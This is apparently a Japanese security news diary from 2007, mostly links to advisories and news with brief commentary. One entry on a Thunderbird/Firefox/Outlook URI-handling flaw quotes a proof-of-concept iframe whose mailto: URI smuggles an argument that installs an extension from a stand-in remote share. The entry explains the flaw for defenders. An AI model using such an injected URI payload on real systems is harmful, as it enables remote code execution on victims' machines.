Last modified: Sun Dec 2 23:48:48 2007 +0900 (JST)
このページの情報を利用される前に、注意書きをお読みください。
》 カーネギーメロン大学日本校情報セキュリティセミナー 「信頼性への取り組み」。 2007.08.31、兵庫県神戸市、無料。
》 オリコン訴訟第四回口頭弁論、終了 (SLAPP WATCH, 7/31)
》 アイリスオーヤマのシュレッダーと噴霧器に不具合、修理へ (家電 Watch, 7/31)
》 「上面操作一口電気こんろ」及び「複数口電気こんろ」の事故の再発防止に向けた抜本的対策について (経産省, 7/31)
》 原子力発電所における計器の設定誤り等への対応について(第3報) (経産省, 7/31)
》 水素自動車の導入について (経産省, 7/31)。RX-8 な公用車ですか。
》 エイズ国際シンポ、当局命令で中止 中国・広州市 (asahi.com, 7/31)
》 カルト宗教独特の世界観は裁判官に通じた?・完全版 (悪徳商法?マニアックス ココログ支店, 7/25)
関連: 【学位商法】全大学教員対象、海外から授与された「ニセ学位」実態調査【イオンド大学】【ディプロマミル】 (弁護士山口貴士大いに語る, 7/25)
(ReaDを使用して調べて見た一例)(中略)
龍谷大学短期大学部社会福祉科教授の萬代愼逸氏 ⇒ イオンド大学から名誉博士号
orz
》 How to troubleshoot LDAP over SSL connection problems (Microsoft)
》 [XWEB] OWA から参照した際に添付ファイルに 512 Byte のスペースが挿入される (Microsoft)。(間抜けな)仕様。
》 Yahoo!、検索サイトのプライバシー・ポリシーを変更——ユーザーの検索データを13カ月後に匿名化 (Open Tech Press, 7/26)
》 Microsoft、シェアード・ソース・ライセンスをOSIに承認申請へ——目的はオープンソース・ライセンスとしての“お墨付き” (Open Tech Press, 7/31)
》 頻発する学校への攻撃で教育が進まず:アフガニスタン (国連情報誌SUNブログ対応版, 7/31)
》 Windows Updateのエラー対応に役立つツール−第1回 WSUS Error Code Lookup Toolの活用 (enterprisezine, 7/31)
》 Ice(Pack) for the summer (panda blog, 7/26)
》 補償金の支払い義務者はメーカーとすべき、権利者団体が主張 「私的録音録画小委員会」の第8回会合 (Internet Watch, 7/27)、 「iPodやPCからも補償金を」と権利者 私的録音録画小委員会 (ITmedia, 7/26)、 私的録音録画補償金制度、いよいよPCにも? (slashdot.jp, 7/27)
》 著作物のアーカイブ事業と意思表示システムについて議論、文化審議会小委 (Internet Watch, 7/27)。デジタルアーカイブねた。
》 Windows Vistaの署名認証をかわすツールが出現 (ITmedia, 7/31)
》 モーニングスター、 TOP ページの警告表示は消えてしまっていますが、 Google ではあいかわらず「このサイトはコンピュータに損害を与える可能性があります」になってますね。
関連: モーニングスターウエブサイトのご利用の皆さまへ (モーニングスター, 7/30)
今回のウイルス侵入については、特定のウイルスを別サイトからダウンロードするプログラムが数日にわたり、複数回弊社サイトに埋め込まれ、その侵入方法はサイトの脆弱性を狙ったファイルの改ざんとであることが判明いたしました。
結局、いつからいつまでだったのかを明確にできないのかな。
》 グーグル八分発見システムが未到プロジェクトで採択 (slashdot.jp, 7/31)。吉本敏洋さんに 3000 点。 関連: 祝!未踏ソフトウェア創造事業に採択されました (beyond.2log.net, 7/31)
》 リトビネンコ事件:自国民の引き渡しにおけるロシアのダブルスタンダード (バイナフ自由通信, 7/31)
》 マルウェア感染サイトの半数がApache、ソフォスが上半期の脅威レポート (Internet Watch, 7/31)
》 ハイブリッド形式オフィスファイル (B-) の独り言, 7/30)
》 柏崎刈羽原発:3号機の揺れ2058ガル 想定の2.5倍 (毎日, 7/31)、柏崎刈羽原子力発電所における平成19年新潟県中越沖地震時に取得された地震観測データの分析に係る報告(第一報)について (東電, 7/30)
東京電力は30日、新潟県中越沖地震により東京電力柏崎刈羽原発3号機タービン建屋1階で、瞬間的な揺れの強さを示す加速度が原発では過去最高とみられる2058ガル(ガルは加速度の単位)に達し、設計上の想定(834ガル)を1200ガル以上超えたと発表した。1000ガルを超える揺れは、全7基のうち4号機以外の6基で記録された。また、3号機の揺れの周期を分析すると、原子炉本体など重要機器への影響が大きい短周期の小刻みな揺れを含め、各周期で想定を2倍程度上回った。
柏崎刈羽原発関連: 安倍政権にNOの審判 今日も原発調査続ける (保坂展人のどこどこ日記, 7/31)
》 民主党:小沢氏が首相退陣と政権奪取へ決意表明 選挙後初 (毎日, 7/31)
小沢氏は常任幹事会終了後、秋の臨時国会で焦点となるテロ対策特別措置法の延長について、記者団に「賛成することはない」と明言した。
関連: テロ対策特別措置法 (首相官邸)
いや、多分連中はコン・バトラー V は知らないと思うが……
》 【不思議の国アメリカ】 何でもありの返品制度が築くゴミの山 (日経 IT Pro, 7/5)。クロトワ「すげぇ……世界が燃えちまうわけだぜ」
》 Winnyはなぜ破られたのか (極楽せきゅあ日記, 7/30)。 cbook24 だと「在庫あり」になっている ので cbook24 に発注してみた。Winnyの技術 を補完するような内容になっているとうれしいけど、どうなんでしょう。
さきほど「発送された」というメールがきた。
》 セキュリティーコンファレンス、米国政府が講演者の入国を拒否 (technobahn, 7/30)
Flake氏によると米入管当局は「ブラックハット」コンファレンスで講演するためには「H1B Visa」(就労ビザに相当)が必要だと述べられて、入国を断られたとしている。
「ブラックハット」コンファレンスの講演は1〜2日程度で終了するものがほとんど。これまではこうした短期のビジネス目的のために米国に入国する場合にH1B Visaが求められることはなかった。
》 NECのナスダック上場問題,最悪のケースでは9月27日から取引停止 (日経 IT Pro, 7/30)
》 海外で盗難・紛失の携帯電話で高額請求の恐れ,NTTドコモが注意喚起 (日経 IT Pro, 7/30)
》 想定死亡者64万人。Webサイトに何ができるのか (日経 IT Pro, 7/31)。新型インフルエンザねた。
Firefox 2.0.0.6 登場。2 件の欠陥が修正されている。佐藤さん情報ありがとうございます。
MFSA 2007-27: エスケープされていない URI が外部プログラムに渡される。 英語版: MFSA 2007-27: Unescaped URIs passed to external programs (英語版の方がわかりやすい)。 Bug 389106 (CVE-2007-3845) - firefox may not escape quotes everywhere、 CVE-2007-3845 の話。Remote Command Execution in FireFox et al も関連。
Firefox/Thunderbird 2.0.0.6 にはこの応用型の元の実証を防ぐ修正が含まれていますが、登録されているプロトコルハンドラの代わりに拡張子を元にしたファイルタイプハンドラが起動してしまう問題は残っています。
Remote Command Execution in FireFox et al はまだ直っていないようだ。
回避方法として、外部プロトコルハンドラの実行時にプロンプトを表示させる方法が紹介されている。
- ロケーションバーに about:config と入力します。
- 「フィルタ」に warn-external と入力します。
- mailto、news、nntp、snews という文字が含まれた各行をダブルクリックし、設定値を true に変更します。
MFSA 2007-26: クロームによって読み込まれた about:blank ウィンドウを通じた特権昇格。 英語版: MFSA 2007-26: Privilege escalation through chrome-loaded about:blank windows。 CVE-2007-3844
サイボウズ Office 6 に 3 つの弱点。Pasiri さん情報ありがとうございます。
サイボウズ Office 6.6 (1.4) で修正されている。 サイボウズ Office 6.6 (1.4) では Windows Vista 上での不具合も修正されているようだ。Windows Vista への対応について (サイボウズ)
printenv.pl(all versions) cross site scripting Vulnerability。Apache のおまけでついてくる printenv.pl に XSS 穴があるという話。 CVE-2007-4049
PMOPB-46-2007: PHP ext/session Session Cookie Parameter Injection Vulnerability (php-security.org)。PHP 5.2.3 でも直っていないそうです。 CVE-2007-3799
JVN#43615794: 弥生会計における認証情報の扱いに関する脆弱性。 patch をあてると、通信が SSL 化されるそうです。
CVE-2007-4058。 VMWare 6.0 に含まれる ActiveX コントロール vielib.dll 2.2.5.42958 に欠陥があり、 remote から既知パス名のコマンドを実行させられる。
102948 - A Security Vulnerability in lbxproxy(1) may Allow Unauthorized Read Access to Files (Sun)。 CVE-2007-4070
Tor 0.1.2.15 is released。 CVE-2007-4097 CVE-2007-4098 CVE-2007-4099
CVE-2007-3387。 gpdf < 2.8.2 に Integer overflow する欠陥があるらしい。RHSA-2007:0730-2
CVE-2007-4051。 UltraDefrag 1.0.3 に heap overflow する欠陥があり、1.0.4 で修正された模様。
CEEK.JP に XSS の脆弱性が発見されました (Ceekz Logs, 2007.07.25)。
CVE-2007-3105 。 Linux < 2.6.22 の乱数生成器方面。root にしか DoS れないのって脆弱性なのかなぁ……。
CVE-2007-3798。tcpdump 3.9.6 以前の print-bgp.c に integer overflow する欠陥があり、remote から攻略 BGP パケットを使って任意のコードを実行できる。patch
Drupal 方面
Asterisk 方面
[SA26239] Joomla! Multiple Vulnerabilities。1.0.13 で修正されている。 CVE-2007-4188 CVE-2007-4189 CVE-2007-4190
》 THC 糸冬了? (てっしーの丸出し, 7/30)。いくつかのプロジェクトが discontinue になって、公開も停止された模様。まだ見えるもの:
まぁ、ぐぐればどこかでみつかるとは思いますが。
》 ブルンジで戦闘再開の恐れ (国連情報誌SUNブログ対応版, 7/28)
》 「行政による殺人だ」北九州餓死事件で法律家らが公開質問状 (JANJAN, 7/28)
》 英国には夏が来ない? 1947年以来最悪の洪水 (中日, 7/25)
昨日近所のスーパーに行ってみたのだが、「中国産うなぎ」が見事なまでに撤去されていた (というか、存在しなかった)。
》 ル・モンド・ディプロマティーク 日本語・電子版 2007.07
》 A site does not run in the expected security zone in Internet Explorer 7 if the site address in the security zone uses a wildcard character (Microsoft)。IE 7 で、セキュリティゾーンのドメイン指定でワイルドカードを使用した場合の挙動が IE 6 と違う部分 (バグ) がある模様。有償 fix が存在する。 Symptom 2 には困ったものだ。
》 ベネズエラがロシア製潜水艦を購入へ (JANJAN, 7/28)。改キロ級 (636 型) を 5 隻、アムール級を 4 隻だそうで。
》 アフラックの代理店社員がノートPC盗難、顧客情報15万人分記録 (Internet Watch, 7/27)。関連:
パソコンを紛失したのは、同社が販売委託している代理店「ツーサン」(東京都新宿区)の男性社員。(中略) 同社によると社員は17日朝、東武東上線志木駅から電車に乗り、パソコンが入ったカバンを網棚に置いたまま席に座った。池袋駅で降りようとした際、カバンがなくなっていることに気づいたという。
なお、同パソコンについては、パスワードの設定や情報の暗号化等のセキュリティ対策を講じており、第三者が容易にお客様情報を閲覧することは困難であると考えております。なんちゃってパスワードやなんちゃって暗号化でないことを祈ります。
》 有毒なコンピュータ廃棄物の不正輸出が拡大中 (Open Tech Press, 7/26)
》 虐殺関係者の恩赦を取り下げない限り合同委員会をボイコット:東ティモール (国連情報誌SUNブログ対応版, 7/27)
》 DDoSとフィッシングへの対応事例報告とIANAの活動 〜 ICANNサンフアン会合の話題から 〜 (JPRS, 7/23)
》 登録者保護のためのレジストラ管理強化の議論 〜 RegisterFly事件を受けて:ICANNサンフアン会合 〜 (JPRS, 7/23)。 RegisterFly事件というのがあったのですか……
RegisterFly事件の事実関係は以下の通りです。
- RegisterFly経営者同士の対立が同社サービスに悪影響。ドメイン名の更新に失敗する事例多発。顧客の苦情がRegisterFlyの顧客サポートを圧迫、さらに事態が悪化。
- ICANNは2006年6月から関係者との面談等により是正を試みていたが、状況は改善せず
- RegisterFlyの経営者が共同経営者を提訴。
- 提訴を受け、ICANNは専任職員2名による強制介入を開始。同社オフィスに出向いて登録情報の監査およびコピー、訴訟および認定取消しの警告、レジストリおよび登録者との調整を始めた。また、事実関係の公表に踏み切った。
今回の事件の問題点として、会合の場で以下が指摘されました。
- 訴訟により、RegisterFlyの最終責任者が不明になった。これが登録情報の引き渡しを難しくした。
- RegisterFlyは、レジストラ契約の条件を盾にICANNへのデータ引渡しを再三にわたり拒否。
- また、相前後して発生したRegisterFlyのシステム上の問題により、顧客がレジストラを変更することができなくなった。
- RegisterFlyが提供していたプロキシ(代理)登録の利用顧客については、RegisterFlyがサービス停止状態になると共に顧客データの回復ができなくなった。
- RegisterFlyのレジストラ認定の経緯に問題がある。RegisterFlyは2004年末頃にICANNがレジストラ認定したTop Class Names, Inc.が2ヶ月後に買収され、経営者が入れ替わったもの。これは非認定企業が認定レジストラを買収する「裏口認定(back-door accreditation)」の典型的な事例。
》 JPRSが工業高校教諭向けの夏季講習会に協力、「ネットの脅威と対策」講座を開催 (RBB TODAY, 7/26)、JPRSが、工業高校の教師を対象とした「インターネット講座」を8月1日に開催 (JPRS, 7/26)
》 安倍事務所秘書らvs週刊朝日 ミニ情報 (SLAPP WATCH, 7/27)
》 中国の携帯電話が抱える“爆弾” (日経 IT Pro, 7/27)。文字どおりの意味で。
》 参議院選挙 2007、与党の歴史的大敗、民主党が第 1 党にですか。
自民党 37 よりも、公明党 9 の方が衝撃だなあ。公明党 9 というのは誰も予想してなかったよね。……いや、そんなことはなかった (それを予想した人はいた) みたい。
選挙関連:
今回の参院選挙に立候補した改選議員(01年当選組)は84人いた。参議院議員の任期は憲法46条で「6年」と決められていて、今回、改選対象だった議員の任期は7月28日で満了した。(中略) 今回の参院選挙に立候補した改選議員は28日までは「現職」だったが、投開票日の29日零時からは憲法の規定で「前」になる。(中略)
投開票日が予定通り7月22日だったら何も問題はなかった。22日投開票ならば改選議員は任期中だから「現」でよかった。安倍首相が強引に通常国会を延長し投開票日が29日になったため「22日投開票」を前提に用意したシステムのボロが出た。その意味ではNHKは安倍首相を恨んだ方がいい。(中略)
※筆者注:『読売』30日朝刊1面左下で、「立候補した参院議員については、28日で任期が切れましたが、現職と表記します」との「おことわり」を入れた。NHKの放送では、そうしたおことわりもなかった。
》 角川グループ、YouTubeにおける動画識別技術の実証実験に全面協力 (日経 IT Pro, 7/26)、 Google、YouTubeに違法動画を防止する技術を導入へ——早ければ今年9月にも運用開始 (Open Tech Press, 7/30)
》 防秘を Winny にタレ流すような国には F-22 は売れません
》 長勢法務大臣の愛人が経営していると報じられたクラブの写真 (関組長の東京・永田町ロビー活動日記blog版, 7/28)
放射線管理区域内への大量の海水流入は極めて異例という
私たちは、昨日の視察で一番印象的だったのが、6号炉の海側でも冷却用配管を2本並べて大勢の作業員が動いている姿だった。点検をしているのか、修繕をしているのか -- 東京電力の担当者もにわかに説明が出来ない。地震前に予定されていた通常の点検はすべて中止をしているとのことで、点検をしているのであれば何をしているのか東京電力は情報公開する責任がある。
一番、不思議なのは地震後に発電所で続いている工事と作業についてである。IAEAの調査前に、修繕出来るところは全部直してしまえということでやっているのか不審を感じる。
》 同程度の事業所が多数ある場合の拠点の選定方法って・・・ (まるちゃんの情報セキュリティ気まぐれ日記, 7/30)
》 内部統制報告書の監査って、経営者評価手続きをする前に監査手続きはできへんよな。。。 (まるちゃんの情報セキュリティ気まぐれ日記, 7/28)
そうなんです。米国の新しい方法(ダイレクトレポーティングのみ)であれば、個々の業務プロセスの経営者評価が終わっていなくても監査人が直接内部統制を評価できるのですが、日本の方式の場合は、経営者評価が終わらないと監査手続が実施できませんから、大変なんですよね。。。
》 「内部統制とIT組織」調査結果 by NTTレゾナント and 三菱総研 (まるちゃんの情報セキュリティ気まぐれ日記, 7/27)
》 チドリブートキャンプ2007 報告 (てっしーの丸出し, 7/29)。やっぱり実習はだいじだよなあ。
》 月周回衛星「かぐや」の打ち上げ延期、原因はコンデンサの逆付け (slashdot.jp, 7/27)、しばらくは動作する例。中途半端に動いてしまうとデバッグはむつかしくなるんだよなあ。
》 Untangle、LinuxWorldでアンチウイルスのライブ対決実施 (ITmedia, 7/27)。Untangle ですか。
》 第10回セキュリティもみじセミナー に参加されたみなさん、おつかれさまでした。あなご天、旨かったです。
tDiary 2.0.x / 2.1.x に欠陥。
場合に、第三者によるツッコミが不正な Host: ヘッダを含んでいると、任意のサイトを指すような RSS が生成されてしまう。
将来の安定版で修正される予定。 tdiary.conf において base_url に日記の URL を指定すれば回避できる。
関連: RSSで任意のドメインに誘導されてしまう脆弱性 (水無月ばけらのえび日記, 2007.07.27)
Thunderbird 2.0.0.4 以前と Firefox 2.0.0.5 以前の組みあわせ、および Mozilla / Netscape Navigator / Outlook / Outlook Express に欠陥。 特定の URI ハンドラが設定されている場合に、 <iframe src='mailto://me@nowhere.com" -install-global-extension \\serverip\shared\cmd.xpi'></iframe> のような mailto: URI を使って、remote から任意のコマンドを実行させることができる。 CVE-2007-4038 (Thunderbird + Firefox) CVE-2007-4039 (Mozilla) CVE-2007-4040 (Outlook / Outlook Express)
Thunderbird 2.0.0.5 + Firefox 2.0.0.5 ではこの欠陥は発現しない。 -osint フラグのおかげのようです。
Firefox 2.0.0.5 / 3.0a6 以前、Netscape Navigator 9 に欠陥。 IE 7 がインストールされた環境で、mailto / nntp / news / snews / telnet URI に %00 (NULL) を含む文字列を指定すると、任意のローカルプログラムを起動できてしまう。 Remote Command Exec (FireFox 2.0.0.5 et al) にデモコードが掲載されている。 IE 6 がインストールされた環境では、この欠陥は発現しない。 CVE-2007-4041 (Firefox)、 VU#783400、 CVE-2007-4042 (Netscape)。
Bug 389580 - some schemes with %00 launch unexpected handlers on windows (mozilla.org) や SA26201: Microsoft Windows URI Handling Command Execution Vulnerability (secunia) によると、この欠陥は必ずしも %00 で発現するわけではないようだ。 CreateUri Function (MSDN) に正規化手順が掲載されている。
Firefox 2.0.0.6 で修正される予定。
Firefox 2.0.0.6 ではまだ修正されていない。
》 [Clamav-users] Phishing.Heuristics.Email.SpoofedDomain。 amazon.co.jp な案内が amazon.com から来る場合もこれにひっかかるようで。 あんまりアレなら PhishingScanURLs no に変更した方がいいのかなあ。(結局、手元では no に変更しました……)
》 Finally...SWF and FLV File Format Spec for v9 is available (Emmy Huang, 7/26)
》 fuRoとL.E.D.、8本の脚・車輪を持った移動ロボット「Halluc II」を発表 (ROBOT Watch, 7/26)。うぉぅ、カッコイイ。「大いなる天上の河」のマンティスってこんな感じなんだろうか、とか思ってしまった。
Hallucigeniaプロジェクトのなかでもっとも重視していることは「車に冗長性を持たせること」だという。無駄もあるかもしれないが、何個か故障しても動ける、あたかも生物のような柔軟さを持たせることが狙い。
》 VistaのマルチGPU問題についてAMDとNVIDIAが回答 (PC Watch, 7/26)
》 .NET FrameworkのService Pack適用に失敗する場合の対処方法 (@IT, 7/25)。NET Framework 1.x ってまだ必要なんですかねえ。
》 政調費、領収書全面公開で最終合意 大阪府議会 (asahi.com, 7/25)。あたりまえのことがニュースになる不思議。 民間の常識、政治家の非常識。
》 ノート型PC発火でやけど、アップルとソニーが訴えられる (読売, 7/25)。Mac ですか。 ソニーとアップル社を提訴、全国初 マック電池発火事故 (asahi.com, 7/25) には炎上写真あり。iBook ですかね。 関連: ソニー製バッテリー搭載のMac発火で損害賠償を求める訴訟 (engadget, 7/25)、 大阪の主婦「PC発火で精神的苦痛」ソニーとアップルジャパンを提訴 (slashdot.jp, 7/26)、 マックが突然爆発 (痛いニュース, 2006.04.09)
》 偽のウェブサイト(フィッシングサイト)へ誘導する フィッシングメールにご注意ください(2007/7/25更新版) (新生銀行, 7/25)、新生銀行を騙るフィッシングサイトのメールがきたので (ふが日記・T, 7/25)
》 インドネシア:エイズ感染者にICチップ 州議会で条例案 (毎日, 7/25)
》 ロシア大統領、「英国は脳入れ替える必要」 激しく批判 (asahi.com, 7/25)。「オマエモナー」と言われるのがオチのような。
》 ネット中傷:発達障害児らの学園、悪質記述で生徒数激減 (毎日, 7/25)
》 総務省の迷惑メール対策研究会、事前同意なしの広告メール禁止を検討 (Internet Watch, 7/25)。オプトイン話。
》 違法・有害サイトの年間通報件数が6万件超える、警察庁まとめ (Internet Watch, 7/25)
》 日本のWEB改竄状況 さんが Sorry, we're closed... になってます。おおかわさん情報ありがとうございます。
》 北朝鮮の偽札、そのDNAを追え (日経 BP, 7/20)
》 トレンドマイクロさんへ - これを消すのて大変なんですよ (JO3GBD-Amateur Radio Statation, 7/24)。こういうのは、ふつう一定時間経過後に自動で消えるようにプログラムするものだと思うのですが、トレンドマイクロではそうではないのですか。
》 ProcessMonitor v1.2, Updates: AutoRuns v8.71, Junction v1.05 (Sysinternals Site Discussion, 7/24) だそうです。
》 FBIと中国公安局、広東州拠点のMSソフト海賊版製造組織を摘発 (ITmedia, 7/25)
》 「ブログを理由に従業員を解雇」9%——米調査 (ITmedia, 7/25)
》 「ノートン・インターネットセキュリティ2008」日本語ベータ無償公開 (Internet Watch, 7/23)
》 「ウィキペディアを引用するな」 (Okumura's Blog, 7/25)
》 Fast HTTP Auth Scanner というものがあるのだそうで。
》 第12回まっちゃ139勉強会(開発者系セキュリティ勉強会)。 2007.08.04、大阪府寝屋川市、1000 円。
》 Microsoft、VistaでマルチGPUが有効にならないバグ 〜希望者に修正プログラムを提供 (PC Watch, 7/24)。マルチ CPU ではなくてマルチ GPU の話。
》 あなた,だまされやすくありませんか?米マカフィーの「フィッシングQ&A」 (日経 IT Pro, 7/25)。日本語版を用意してほしいですねえ。題材も mixi とかに変更して。
》 インストール不要の無料アンチウイルスソフト「ClamWin Portable」 (gigazine, 7/25)。USB メモリ上にインストールして利用する ClamWin Portable の解説。
》 PuTTY 0.60 ごった煮版 2007年7月25日版 (ゑBLOG, 7/25) が出ています。 「未検証のコードが混入していたため削除」したそうです。
》 ISC DHCP 3.1.0 が正式リリースされてますね。
》 検証・耐震偽装 悪いのは誰か?何か?(17)国土交通省の目まぐるしい人事 (JANJAN, 7/20)
》 ドイツ:アフガニスタンへの軍事関与をめぐる懸念 (JANJAN, 7/22)
》 「米国大学(院)学位商法」の危険性−ニセ科学関連(教育、波動、健康食品) (JANJAN, 7/23)
》 ロシア:「プーチン後」 人権侵害継続か (JANJAN, 7/24)
Holes in Firefox password manager [Update] (heise security, 2007.07.20) (デモサイト) の話。 CIS Finds Flaws in Firefox v2 Password Manager に類似した、ただし JavaScript を必要とする欠陥がある模様。Safari も同様らしい。
JVN#25471539 「Aruba Mobility Controller」シリーズにおけるクロスサイト・スクリプティングの脆弱性 (IPA ISEC, 2007.07.25)
InterActual Player Two ActiveX Controls Buffer Overflow Vulnerabilities。InterActual Player 2.x の IAMCE.dll / IAKey.dll ActiveX コントロール話。まだ直ってない。 CVE-2007-3829
CVE-2007-3383: XSS in Tomcat send mail example。 Apache Tomcat 4.0.0-4.0.6, 4.1.0-4.1.36 に付属するサンプルファイルに XSS 欠陥があるという話。4.1.HEAD では修正されている。 CVE-2007-3383
SEC Consult SA-20070722-0 :: Remote command execution in Joomla! CMS。 Joomla! 1.5 RC1 で直っているそうです。
[SA26147] RSBAC User Management Authentication Bypass Vulnerabilit。 RSBAC 1.3.5 で直っているそうです。
[Full-disclosure] TPTI-07-13: Borland Interbase ibserver.exe Create-Request Buffer Overflow Vulnerability。ibserver.exe に buffer overflow する欠陥があり、remote から任意のコードを実行できる。InterBase 2007 SP2 で修正されている。 CVE-2007-3566
[SA26183] IBM WebSphere Application Server Unspecified Vulnerability。 Fix Pack 21 (6.0.2.21) で直っているそうです。
[Full-disclosure] WabiSabiLabi exploit attached。 Windows Implementation of RSHD が stack overflow する欠陥を突いているのだそうで。
iPhone 関連:
IBM Internet Security Systems プロテクション アドバイザリ: CA Message Queuing Server (Cam.exe) でのオーバーフロー (ISSKK)。 CA Unicenter Suite の共有コンポーネント CA Message Queuing Server (Cam.exe) に欠陥があり、stack overflow が発生、remote から任意のコードを実行できる。 CVE-2007-0060
patch があるので適用すればよい。関連:
スキャンエンジン 5.91.02 以降では直っているようです。
BIND 9.x を DNS cache サーバとして運用した場合に欠陥。 transaction ID の生成に用いる擬似乱数生成器 (PRNG) に欠陥があり、これを利用されると DNS cache 汚染を招く。 CVE-2007-2926
BIND 9.2.8-P1, BIND 9.3.4-P1, BIND 9.4.1-P1 で修正されている。
[EXPL] DNS Cache Poison (BIND 9) (SecuriTeam, 2007.08.07)
bind 8 にも同様の欠陥があり、BIND 8.4.7-p1 が出ている。
ただし、bind 8 はもはやメンテナンスが終了しているため、bind 9 の最新版へ移行することが望ましい。
忘れられたWii対応? Flashパッチのバージョン番号に混乱 (ITmedia, 2007.07.24) より:
Kasperskyによると、WiiのFlash Player 7.0.70.0は、ほかのプラットフォーム用の7.0.70.0よりも前の日付になっており、同じものでないことは明らかだという。AdobeのサイトにWiiについての記載はなく、Wiiのことは忘れられているようだという。
バージョン番号が同じでも日付が違うのはよくあることなので別にいいのですが、中身まで違っていると困るのですよね……。
》 「タミフル異常死」高校生の遺族、医薬品機構相手に提訴へ (読売, 7/24)。いよいよ提訴してしまいましたか。
男子生徒は2004年2月、A型インフルエンザと診断され、処方されたタミフルを1錠服用した約1時間半後に、はだしのまま自宅から国道に飛び出し、トラックにはねられて死亡した。
男性は翌年2月、タミフルによる副作用を訴えて、同機構に被害救済を申請。同機構は「異常行動は、タミフルの前に服用していた別の抗インフルエンザ薬・塩酸アマンタジン(商品名・シンメトレル)の副作用」と認定し、遺族一時金などの支給を決定した。
しかし、男性は「直前に服用したタミフルの影響であることは明らか」として、一時金の受け取りを拒否。同機構への異議申し立ても昨年12月に却下されたため、提訴に踏み切る。
タミフルについて (鈴の木こどもクリニック) によると
インフルエンザの治療薬でタミフルだけが突出して精神症状(異常行動)を起こすのでしょうか。実は塩酸アマンタジン(シンメトレル)はタミフルと比較にならないほど、高頻度に精神神経症状を起こすのです(→シンメトレル)。そのため、シンメトレルは朝、昼と2回、夜を避けて服用することが勧められているほどなのです(夜服用すると高率にうわごとをいったり、騒いだりする)。
だそうですから、ふつうに考えれば、医薬品機構の認識の方が正しそうな気がするけどなあ……。 脳からタミフル検出なし/琉大准教授が研究 服用後転落死中1男子生徒 (沖縄タイムス, 7/24) なんて研究結果まで出てきているようですし。 関連:
タミフルについて (鈴の木こどもクリニック) からもう少し引用:
最後に、今マスコミでたれ流されている、トンデモ発言に反論します。
「タミフルの70%を日本で消費している。日本はタミフルを使いすぎだ。」
マスコミ連中の発言でも、最も恥知らずで無責任なのは、この発言です。誰のおかげで、日本がこれだけタミフルの消費大国になってしまったのでしょうか。2003年、「一時も早くインフルエンザの検査をして、タミフルを飲まなければ、インフルエンザ脳症になるぞ!」「タミフルがない!インフルエンザの特効薬がなくなった!脳症になる!厚生労働省は何やっているんだ!」と日本の親達を脅かし、煽りまくって、インフルエンザ迅速診断→陽性→タミフル投与と流れを作り出したのは当のマスコミ自身ではありませんか。
インフルエンザ検査陽性でも全身状態がよい子どもにタミフルを処方しないと、「何故タミフルを出さない」と激高した親と小競り合いになった経験をほとんどの医師は持っているはずです。インフルエンザなら必ずタミフルを服用する、という流れはマスコミが主導して作り上げてきたのです。その結果の70%です。もう少し、マスコミ関係者は「あるある」捏造問題だけでなく、自分達がしてきたことを検証してみたほうがよいのではないでしょうか(わずか3〜4年前の記録です。少なくても自局のワイドショーのVTRは残っていると思いますが)。
さらに付け加えれば、タミフルの消費のかなりの部分を我が国が占めていることが事実なら(事実ですが)、これは別に恥ずかしいことでも悪いことでもなく、誇るべきことだと考えます。
なぜならば、タミフルは高価な薬のため、外国では金持ちしかタミフル投与の恩恵を受けることができないのです。国民皆保険で医療費自己負担が少ない我が国だからこそ、全ての患者が分け隔てなく、タミフルの恩恵にあずかることができるのです。それとも、日本でも医療においても格差が進み、自民党の代議士や厚生労働省のキャリアや朝日新聞の論説委員やNHKの総合プロデューサーの子どもだけが、特権的にタミフル処方を受けられる制度をマスコミ関係者は夢見ているのでしょうか。
タミフルの 70% を日本が消費しているのは事実なのでしょうが、「来たるべき新型インフルエンザへの対応を今から実地検証しているとでも考えればいいでしょう。それとも何か、スペインインフルエンザの時のように日本国内で 30 万人死亡してもいいのかね?」とでも言っておけば十分だと思うのですけどねえ。 厚労省の役人やマスゴミの中の人は、グレート・インフルエンザ でも読んで考えなおした方がいいと思うんですけどねえ。 訳に難ありなのがアレなのだけど。
あと、抗ウィルス剤: 塩酸アマンタジン(シンメトレル) (鈴の木こどもクリニック) にはこんな記述が:
近年、中国は鳥インフルエンザ対策として、薬価が安いアマンタジンを大量に飼料に混ぜて鶏に服用させていたため、ほとんどのA型インフルエンザがシンメトメル耐性になってしまったことがわかりました(詳しくはこちら)。アメリカのCDC(疾病管理センター)は2006年1月にインフルエンザの予防と治療にアマンタジンとリマンタジン(アマンタジン類似薬)を使用しないよう、勧告しました(報道はこちら)。中国の身勝手な振る舞いで、抗インフルエンザ薬がひとつ消滅してしまったことはまことに残念です。
そんなことになっていたとは。
》 CIAフォーラム研究会 「〜米国SOX 法404 条の教訓を踏まえた〜JSOX への対応アプローチ」を公表 (まるちゃんの情報セキュリティ気まぐれ日記, 7/21)
》 監査法人の選任権・報酬決定権を監査役に? (まるちゃんの情報セキュリティ気まぐれ日記, 7/22)
》 NISC JRE等を利用する政府機関の公開情報システムに係る緊急調査の結果を公表 (まるちゃんの情報セキュリティ気まぐれ日記, 7/23)
》 質問主意書に対する答弁内容 (ESPIO, 7/21)
》 見えますか? カラーレーザープリンターの印刷物に埋め込まれた暗号コード (technobahn, 7/23)。 Is Your Printer Spying On You? (EFF) の話。
》 「通信・放送の総合的な法体系に関する研究会中間取りまとめ」についてのパブリックコメント (崎山伸夫のBlog, 7/21)
》 不正アクセスで閉鎖していた再春館製薬所のWebサイト、全面再開 (Internet Watch, 7/23)
》 「1世代コピー9th」では誰も幸せになれない (ITmedia, 7/23)
》 Yahoo!JAPAN、動画共有サイトの著作権料をJASRACに支払うことで合意 (gigazine, 7/24)
》 Flashをブロックして意外と使えると思った副作用 (yohgaki's blog, 7/24)
》 新手のWFPハッキングについて考える (日経 IT Pro, 7/24)。Windows File Protection の undocumented API ねた。
》 オリコン訴訟、第四回口頭弁論はまもなく7月31日 (SLAPP WATCH, 7/22)
》 カリフォルニア州沿岸で巨大イカが異常繁殖、地球温暖化の影響? (technobahn, 7/22)。アメリカオオアカイカ。そのままでは不味いらしい。
》 村上被告の背後にいる巨悪 (日経 BP, 7/23)
》 NECプロジェクター「ビューライトLT20J」の無償点検・修理の実施について (NEC ディスプレイ, 7/23)
》 ボット対策プロジェクトに関するISP向け説明会の開催 (総務省, 6/19) というのをやっているのだそうで ([openmya:038218])。
ボットに感染しているユーザの特定及び感染事実の通知と駆除の注意喚起などを、ISPをはじめとした関係機関の協力により実施しています。
ISP から見ると仕事が増えるだけなんだけど、そこをなんとかぜひとも、という話かしら。
》 2007年6月度 サイバークリーンセンター活動実績 (サイバークリーンセンター, 7/18)。注意喚起活動実績、ここまで画像だらけにする必要がどこにあるのだろう。
